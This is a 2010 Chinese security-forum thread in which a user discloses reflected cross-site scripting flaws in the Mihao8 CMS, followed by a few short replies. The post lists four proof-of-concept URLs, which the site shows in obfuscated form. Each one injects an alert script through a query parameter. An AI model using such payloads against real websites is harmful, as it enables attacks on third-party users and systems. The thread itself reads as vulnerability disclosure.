首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[原创]米号吧文章管理系统跨站0day漏洞
发表于: 2010-4-24 19:28 3231

[原创]米号吧文章管理系统跨站0day漏洞

riusksk 活跃值
41
2010-4-24 19:28
3231
# Exploit Title: Mihao8 CMS Multiple XSS Vulnerabilities
# Date: 2010-4-23
# Author: riusksk(泉哥)
# Blog:8a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0A6N6i4y4C8M7$3E0Q4x3X3g2T1L8r3!0Y4j5Y4g2K6i4K6u0W2j5$3!0E0
# Tested on: [Windows 7]

=========================================================================================================================
                         o8o                       oooo                 oooo        
                         `"'                       `888                 `888        
               oooo d8b oooo  oooo  oooo   .oooo.o  888  oooo   .oooo.o  888  oooo  
               `888""8P `888  `888  `888  d88(  "8  888 .8P'   d88(  "8  888 .8P'   
                888      888   888   888  `"Y88b.   888888.    `"Y88b.   888888.   
                888      888   888   888  o.  )88b  888 `88b.  o.  )88b  888 `88b.  
               d888b    o888o  `V88V"V8P' 8""888P' o888o o888o 8""888P' o888o o888o
=========================================================================================================================
                                      Mihao8 CMS Multiple XSS Vulnerabilities
=========================================================================================================================
# Exploit Code :
=====================================================0x1=================================================================
3ccK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2A6K9r3q4G2z5q4)9J5k6h3y4G2L8g2)9J5c8X3W2F1k6r3g2^5i4K6u0W2j5i4y4H3i4K6y4r3k6X3!0J5N6h3#2u0c8q4)9K6c8o6u0Q4x3U0k6K6N6h3u0U0L8r3q4K6M7@1W2p5i4K6y4p5x3g2)9J5y4X3q4U0N6q4)9K6c8o6q4Q4x3U0k6U0L8r3q4K6M7$3W2U0d9f1c8Q4x3@1b7I4i4K6t1$3k6%4c8Q4x3@1t1`."><script>alert("riusksk")</script>&page=1
=====================================================0x3=================================================================
16bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2A6K9r3q4G2z5q4)9J5k6h3y4G2L8g2)9J5c8X3W2F1k6r3g2^5i4K6u0W2j5i4y4H3i4K6y4r3k6X3!0J5N6h3#2u0c8q4)9K6c8o6u0Q4x3U0k6K6N6h3u0U0L8r3q4K6M7@1W2p5i4K6y4p5x3g2)9J5y4X3q4U0N6q4)9K6c8o6q4Q4x3U0k6Y4N6q4)9K6b7R3`.`."><script>alert("riusksk")</script>&classicID=1&page=1
=====================================================0x4=================================================================
470K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2A6K9r3q4G2z5q4)9J5k6h3y4G2L8g2)9J5c8X3W2F1k6r3g2^5i4K6u0W2j5i4y4H3i4K6y4r3k6X3!0J5N6h3#2u0c8q4)9K6c8o6u0Q4x3U0k6K6N6h3u0U0L8r3q4K6M7@1W2p5i4K6y4p5x3g2)9J5y4X3N6@1i4K6y4n7"><script>alert("riusksk")</script>&act=1&classicID=1&page=1
=====================================================0x5=================================================================
6e7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2A6K9r3q4G2z5q4)9J5k6h3y4G2L8g2)9J5c8Y4y4K6j5W2)9J5k6h3q4K6M7q4)9K6c8X3k6G2M7Y4g2E0d9f1c8Q4x3@1b7I4i4K6t1$3M7%4g2T1j5$3I4S2M7%4y4u0c8q4)9K6c8o6q4Q4x3U0k6Y4N6q4)9K6b7R3`.`."><script>alert("riusksk")</script>&act=1&classicID=1&page=1
=====================================================EOF=================================================================

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 0
支持
分享
最新回复 (5)
riusksk
雪    币: 433
活跃值: (1895)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
私信
2
这版块太冷清了,发点小小小的0day漏洞娱乐一下大众
2010-4-24 19:29
0
耳聋
雪    币: 66
活跃值: (26)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
3
泉哥的热心,佩服哈!
『软件使用』版块也冷清的很,泉哥发个小小小小的原创软件也来支持下哈!
2010-4-24 20:44
0
riusksk
雪    币: 433
活跃值: (1895)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
私信
4
哪天不小小小小心路过的话,又刚好不小小小小心写了个破工具的时候,就可能会不小小小小心地发到那版块了
2010-4-24 20:52
0
耳聋
雪    币: 66
活跃值: (26)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
5
期待泉哥的作品!
2010-4-24 23:54
0
wangshutai
雪    币: 250
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
跨站,利用起来比较麻烦吧,不知道如何利用。呵呵。
2010-6-24 13:43
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回